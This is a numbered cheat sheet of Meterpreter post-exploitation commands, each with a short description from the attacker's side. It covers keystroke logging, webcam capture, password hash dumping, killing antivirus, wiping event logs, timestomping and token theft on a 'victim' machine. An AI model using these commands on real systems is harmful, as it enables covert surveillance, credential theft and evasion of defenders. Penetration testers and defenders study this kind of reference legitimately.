Meterpreter Commands
1. sysinfo -----> shows the system build x86 or x64, language version, build...etc
2. run checkvm    ------>  checks to see if the victim is running a Virtual Machine or native.
3. route   --------> Dumps the routing table to the screen and shows how the subnet has been configured...etc
4. run get_application_list  -------> This shows you applications installed on the remote PC
5. uictl  --------->  Control Some of the User Interface Components
6. idletime ----->  shows how long the victim has not been active on the computer.
7. getpid ---------> This is to get the process ID and shows the process of which you are currently running off of.
8. getuid -------> This will show you the system identity and show you who you are running as such as system.
9. ps ------> This shows all the processes running on the victim as well as the PIDs
10. run get_env -------> This will give you a lot of info on the system
11. ifconfig and ipconfig -----> Find out the IP address and see how many adapters are enabled.
12. ? ------> Shows a list of different commands.
13. getsystem -----> attempts to give you local system privileges
14. reboot ------> Reboot the remote machine
15. sc config process_name start= disabled  --------> stops a process from starting on next system reboot. "process_name" is the name of the process you want to disable.
16. clearev -------> Wipes all event logs.
17. execute -f cmd.exe -H -c  ------>  Open a command prompt on a hidden channel.
18. interact 1  ------> interact with a channel. "1" will be replaced with the channel you want to interact with.
19. download  -------> This command will download the specified file.  "Example"    download c:\\boot.ini
20. upload --------> upload files to the victim machine
21. portfwd ------> forward a local port to a remote service
22. run getgui -e  ------> this will enable remote desktop on the victim.
23. run gettelnet -e  -------> To enable telnet on remote machine.
24. run getcountermeasure  ------>  checks the security configuration on the exploited machine and it can disable countermeasures such as AV, firewalls, etc
25. run killav  ------->   it is designed to kill most AVs that are running as a service on the exploited machine. Works on some but not all AVs.
26. run get_local_subnets  ------>  used to get the local subnet of the victim machine.
27. run hostedit  ------->  allows the attacker to add entries to the Windows hosts file.  Because Windows checks the hosts file first, traffic can be diverted to a fake entry.
28. run remotewinenum  -------> designed to enumerate the target system with the wmic command
30. run winenum ------->  used for system enumeration.  It will dump tokens, hashes, and issue both net and wmic commands
31. run scraper  -------->  used for grabbing additional system information not included in the other system enumerating scripts, such as the “entire registry.”
32. migrate  --------> Migrate to Another Process such as explorer.exe so you don't lose your session.
33. cat  ------->  Read the Contents of a File to the Screen
34. background  "or ctrl + z"  -------->  Background the Current Session
35. irb -------> Drop into irb Scripting Mode
36. interact  --------> Interact with a Channel
37. load ------> Load One or More Meterpreter Extensions.
38. channel  -------> Displays Info About Active Channels
39. bgkill  --------->  Kill a Background Meterpreter Script
40. close  -------->  Close a Channel
41. enumdesktops  -------->  List All Accessible Desktops and Window Stations
42. getdesktop  ------->  Get the Current Meterpreter Desktop
43. lpwd  -------->  Print Local Working Directory
44. ls  -------->  list Files
45. rm  -------->  Delete the Specified File
46. search  -------->  Search for Files.
47. upload  ------>  Upload File to Target
48. keyscan_start  -------->  Start Capturing Keystrokes
49. keyscan_stop  -------->  Stop Capturing Keystrokes
49. keyscan_dump  -------->   Dump the Keystroke Buffer
50. screenshot  -------->   Screenshot of the GUI
51. setdesktop  --------->  Change the Meterpreter's Current Desktop.
52. getprivs  --------->  Attempt to Enable All Privileges Available to the Current Process
53. kill -------->  Terminate a Process    "Example"   kill 1834
54. reboot  -------->  Reboots the Remote Computer
55. reg  --------->  Interact with the Remote Registry.
56. rev2self  --------->  Calls RevertToSelf() on the Remote Machine
57. shell  --------> Drop into a system shell.
58. shutdown  -------->  Shuts Down the Remote Computer
59. steal_token  ------>  Attempt to Steal an Impersonation Token from the Process
60. webcam_list  -------->  List webcams
61. webcam_snap  ------->  Take a snapshot from the specified webcam.
62. hashdump  -------->  Dumps the content of the SAM Database.
63. timestomp  ------->  Manipulates MACE Attributes
64. execute  ------> Execute a command.
65. info  -------->  Display info about active post module.
66. quit  -------->  Terminate the meterpreter session.
67. getwd  ------->  Print Working Directory
68. mkdir  ------->  make directory.
69. pwd  -------> print working directory.
70. drop_token  ------->  Relinquishes Any Active Impersonation Token
71. rmdir  --------> remove directory.
72. del  -------> delete file "example"  del passwords.txt